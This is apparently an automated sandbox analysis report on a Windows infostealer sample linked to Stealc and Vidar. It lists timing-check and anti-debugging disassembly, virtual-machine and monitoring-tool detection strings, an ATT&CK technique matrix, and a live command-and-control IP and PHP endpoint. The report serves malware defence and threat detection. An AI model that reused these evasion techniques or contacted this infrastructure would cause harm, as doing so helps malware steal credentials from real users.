                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FEF9 second address: B6FF0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4A80B11C36h 0x00000009 jg 00007F4A80B11C36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FF0A second address: B6FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4A81237CCDh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F61F second address: B6F625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F625 second address: B6F632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F4A81237CC6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F632 second address: B6F646 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4A80B11C3Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F905 second address: B6F909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FBC2 second address: B6FBF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4A80B11C49h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4A80B11C45h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FBF8 second address: B6FBFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1CD14 second address: B1CD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4A80B11C38h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 mov dword ptr [ebp+124688BEh], ebx 0x00000018 popad 0x00000019 mov dword ptr [ebp+122D1BD3h], ebx 0x0000001f mov ebx, dword ptr [ebp+1247DD1Ah] 0x00000025 add eax, ebx 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F4A80B11C38h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 call 00007F4A80B11C3Dh 0x00000046 mov edx, eax 0x00000048 pop edx 0x00000049 xor edx, 3DFB6001h 0x0000004f push eax 0x00000050 pushad 0x00000051 jc 00007F4A80B11C3Ch 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1CD7C second address: B1CDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F4A81237CD3h 0x0000000a jo 00007F4A81237CC6h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 pop edi 0x00000018 pop edx 0x00000019 push 00000004h 0x0000001b sub ecx, dword ptr [ebp+122D2C1Ch] 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jo 00007F4A81237CC8h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B758C2 second address: B758C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A5B9 second address: B7A5ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F4A81237CDBh 0x0000000f jmp 00007F4A81237CCFh 0x00000014 jbe 00007F4A81237CC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79BD2 second address: B79BF6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4A80B11C3Ch 0x00000008 jno 00007F4A80B11C36h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4A80B11C44h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79BF6 second address: B79BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A159 second address: B7A186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C42h 0x00000007 jmp 00007F4A80B11C41h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A186 second address: B7A18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B826B7 second address: B826F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C47h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F4A80B11C47h 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F4A80B11C36h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B826F5 second address: B82717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A81237CD7h 0x0000000b push esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B808BE second address: B808D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4A80B11C45h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B808D8 second address: B808E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4A81237CC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B808E2 second address: B8091A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F4A80B11C3Ah 0x0000000e jmp 00007F4A80B11C3Dh 0x00000013 js 00007F4A80B11C45h 0x00000019 jmp 00007F4A80B11C3Fh 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81094 second address: B8109A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B815B2 second address: B815BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B815BA second address: B815BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8187D second address: B81883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81883 second address: B818BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F4A81237CD8h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F4A81237CCEh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jo 00007F4A81237CC6h 0x0000001f pop edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B818BF second address: B818C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82425 second address: B8242B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8242B second address: B8242F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8242F second address: B82433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF89A second address: ACF89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF89E second address: ACF8EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD4h 0x00000007 jns 00007F4A81237CE4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4A81237CD3h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF8EF second address: ACF8FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A80B11C3Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B857F0 second address: B857F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B857F8 second address: B857FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B857FE second address: B8582E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4A81237CD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F4A81237CC6h 0x00000019 jno 00007F4A81237CC6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8582E second address: B85843 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4A80B11C3Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85984 second address: B8598A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85AE4 second address: B85B1B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4A80B11C36h 0x00000008 jmp 00007F4A80B11C49h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pushad 0x00000011 jmp 00007F4A80B11C3Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85B1B second address: B85B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85B1F second address: B85B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85B23 second address: B85B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jnc 00007F4A81237CC6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85B33 second address: B85B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85C97 second address: B85C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 971EF1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B1453B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: BA14E3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_007238B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00724910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00724910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0071DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0071E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00724570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00724570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0071ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0071BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0071DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007116D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0071F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00723EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00723EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00711160 GetSystemInfo,ExitProcess, 0_2_00711160
                Source: file.exe, file.exe, 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1743203944.0000000001285000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743203944.0000000001258000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1743203944.000000000128B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW,
                Source: file.exe, 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13546
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13549
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13567
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13560
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13600
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007145C0 VirtualProtect ?,00000004,00000100,00000000 0_2_007145C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00729860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00729860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00729750 mov eax, dword ptr fs:[00000030h] 0_2_00729750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00727850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00727850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 3808, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00729600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: YProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00727B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00726920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00727850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00727A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1702267630.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3808, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1702267630.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3808, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37 | file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.php)q | file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://185.215.113.37/e2b1563c6670f193.phpT | file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://185.215.113.37/e2b1563c6670f193.php=qj | file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://185.215.113.37s | file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1521407
Start date and time: 2024-09-28 08:55:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 93
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
